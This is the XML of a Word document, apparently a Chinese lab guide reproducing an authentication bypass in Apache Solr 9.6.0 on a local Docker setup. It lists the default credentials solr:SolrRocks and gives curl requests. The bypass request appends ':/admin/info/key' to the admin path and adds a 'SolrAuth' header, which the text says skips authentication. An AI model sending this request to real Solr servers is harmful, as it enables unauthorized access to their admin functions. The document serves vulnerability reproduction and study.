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15217A30" w14:textId="44A23673" w:rsidR="00DA0DBA" w:rsidRDefault="00C43EFA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59651D59" w:rsidR="00EA3792" w:rsidRDefault="00C43EFA" w:rsidP="00DA0DBA"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5260C930" w14:textId="545D6113" w:rsidR="00C43EFA" w:rsidRPr="00C43EFA" w:rsidRDefault="00C43EFA" w:rsidP="00DA0DBA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>3、</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Solr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>版本为9.6.0，</w:t>
      </w:r>
      <w:r w:rsidRPr="00C43EFA">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">同时启用了身份验证 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C43EFA">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>solr:SolrRocks</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="35241458" w14:textId="587AEDDE" w:rsidR="00CD5E58" w:rsidRDefault="00CD5E58" w:rsidP="00DA0DBA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>4、复现结束后使用命令</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA3792">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>docker-compose</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> down关闭容器。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2234401B" w14:textId="3711C55C" w:rsidR="00864F1A" w:rsidRPr="00EA3792" w:rsidRDefault="00C43EFA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4347257" wp14:editId="183AD9A6">
            <wp:extent cx="5274310" cy="1290320"/>
            <wp:effectExtent l="0" t="0" r="2540" b="5080"/>
            <wp:docPr id="1778906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6A28C238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1. 使用访问下面的网址，可以看到 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Solr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 返回错误 401：缺少身份认证信息</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="545D96DB" w14:textId="77777777" w:rsidR="00C43EFA" w:rsidRPr="00C43EFA" w:rsidRDefault="00C43EFA" w:rsidP="00C43EFA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C43EFA">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> curl --path-as-is -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C43EFA">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C43EFA">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> -s -k -X $'GET' \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="257121AF" w14:textId="77777777" w:rsidR="00C43EFA" w:rsidRPr="00C43EFA" w:rsidRDefault="00C43EFA" w:rsidP="00C43EFA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C43EFA">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">       -H $'Host: localhost:8983' \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0025ED0D" w14:textId="77777777" w:rsidR="00C43EFA" w:rsidRPr="00C43EFA" w:rsidRDefault="00C43EFA" w:rsidP="00C43EFA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C43EFA">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">       $'http://localhost:8983/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C43EFA">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>solr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C43EFA">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>/admin/cores'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BDD2C3E" w14:textId="75647B30" w:rsidR="00C43EFA" w:rsidRDefault="00C43EFA" w:rsidP="00C43EFA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="036611DC" wp14:editId="66580F01">
            <wp:extent cx="5274310" cy="1416050"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="7502525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0E61" w14:textId="77777777" w:rsidR="00C43EFA" w:rsidRDefault="00C43EFA" w:rsidP="00C43EFA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">2. 在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后加上 :/admin/info/key，并在请求体中加入 SolrAuth 字段，可以看到成功绕过身份验证直接访问</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="136554C1" w14:textId="77777777" w:rsidR="00C43EFA" w:rsidRPr="00C43EFA" w:rsidRDefault="00C43EFA" w:rsidP="00C43EFA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C43EFA">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> curl --path-as-is -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C43EFA">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C43EFA">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> -s -k -X $'GET' \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31713D11" w14:textId="77777777" w:rsidR="00C43EFA" w:rsidRPr="00C43EFA" w:rsidRDefault="00C43EFA" w:rsidP="00C43EFA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C43EFA">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">       -H $'Host: localhost:8983' -H $'SolrAuth: 11' \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60407D8E" w14:textId="77777777" w:rsidR="00C43EFA" w:rsidRPr="00C43EFA" w:rsidRDefault="00C43EFA" w:rsidP="00C43EFA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C43EFA">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">       $'http://localhost:8983/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C43EFA">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>solr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C43EFA">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>/admin/cores:/admin/info/key'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59E6D51A" w14:textId="01EDFF06" w:rsidR="00864F1A" w:rsidRPr="00864F1A" w:rsidRDefault="00C43EFA" w:rsidP="00C43EF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1F111B" wp14:editId="0407404E">
            <wp:extent cx="5274310" cy="2194560"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="21147847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sectPr w:rsidR="00864F1A" w:rsidRPr="0086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37508"/>
    <w:rsid w:val="001F470D"/>
    <w:rsid w:val="00353491"/>
    <w:rsid w:val="004A00AD"/>
    <w:rsid w:val="00553595"/>
    <w:rsid w:val="00864F1A"/>
    <w:rsid w:val="00881BAE"/>
    <w:rsid w:val="009D5886"/>
    <w:rsid w:val="00BB76DC"/>
    <w:rsid w:val="00BC10EC"/>
    <w:rsid w:val="00C43EFA"/>
    <w:rsid w:val="00C66350"/>
    <w:rsid w:val="00CD5E58"/>
    <w:rsid w:val="00DA0DBA"/>
    <w:rsid w:val="00DA5642"/>
    <w:rsid w:val="00DB3F6F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6</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-05-27T14:34:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-10-30T07:16:00Z</dcterms:modified>
</cp:coreProperties>
</file>